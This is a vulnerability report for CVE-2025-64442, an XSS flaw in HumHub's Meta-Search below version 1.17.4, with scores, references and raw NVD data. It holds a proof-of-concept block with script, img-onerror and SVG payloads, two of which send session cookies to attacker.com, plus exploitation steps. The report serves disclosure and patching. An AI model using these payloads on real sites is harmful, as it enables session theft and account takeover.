Security Vulnerability Report
CVE-2025-64442 CVSS 6.1 MEDIUM

Published: 2025-11-07 21:15:42
Last Modified: 2025-11-26 15:41:54

Description

HumHub is an Open Source Enterprise Social Network. Versions below 1.17.4 have an XSS vulnerability in the Meta-Search feature which allows malicious input to be executed in search previews. This issue is fixed in version 1.17.4.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:humhub:humhub:*:*:*:*:*:*:*:* - VULNERABLE
HumHub < 1.17.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```html
<!-- CVE-2025-64442 PoC for HumHub Meta-Search XSS -->
<!-- Payload: <script>alert(document.domain)</script> -->
<!-- This PoC demonstrates the XSS vulnerability in HumHub's Meta-Search feature -->

<!-- Method 1: Direct script injection -->
<script>alert('XSS');console.log('Cookie: '+document.cookie)</script>

<!-- Method 2: Event handler based -->
<img src=x onerror="fetch('https://attacker.com/steal?c='+document.cookie)">

<!-- Method 3: SVG based -->
<svg/onload=fetch('https://attacker.com/log?data='+btoa(document.cookie))>

<!-- Exploitation steps:
1. Inject malicious payload in HumHub search box
2. Wait for victim to view search preview
3. Malicious JS executes in victim's browser context
4. Attacker steals session cookies or performs actions as victim -->
```

References

- https://github.com/humhub/humhub/pull/7814 (Patch)
- https://github.com/humhub/humhub/releases/tag/v1.17.4 (Release Notes)
- https://github.com/humhub/humhub/security/advisories/GHSA-2hgp-33j2-93cc (Patch, Vendor Advisory)

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-64442", "sourceIdentifier": "[email protected]", "published": "2025-11-07T21:15:41.847", "lastModified": "2025-11-26T15:41:54.260", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HumHub is an Open Source Enterprise Social Network. Versions below 1.17.4 have a XSS vulnerability in the Meta-Search feature which allows malicious input to be executed in search previews. This issue is fixed in version 1.17.4."}, {"lang": "es", "value": "HumHub es una Red Social Empresarial de Código Abierto. Las versiones anteriores a la 1.17.4 tienen una vulnerabilidad XSS en la función de Meta-Búsqueda que permite que una entrada maliciosa se ejecute en las vistas previas de búsqueda. Este problema está solucionado en la versión 1.17.4."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:humhub:humhub:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.17.4", "matchCriteriaId": "C645FF0D-F1B7-4ADB-8F4A-5BC04EFAB53B"}]}]}], "references": [{"url": "https://github.com/humhub/humhub/pull/7814", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/humhub/humhub/releases/tag/v1.17.4", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/humhub/humhub/security/advisories/GHSA-2hgp-33j2-93cc", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}
```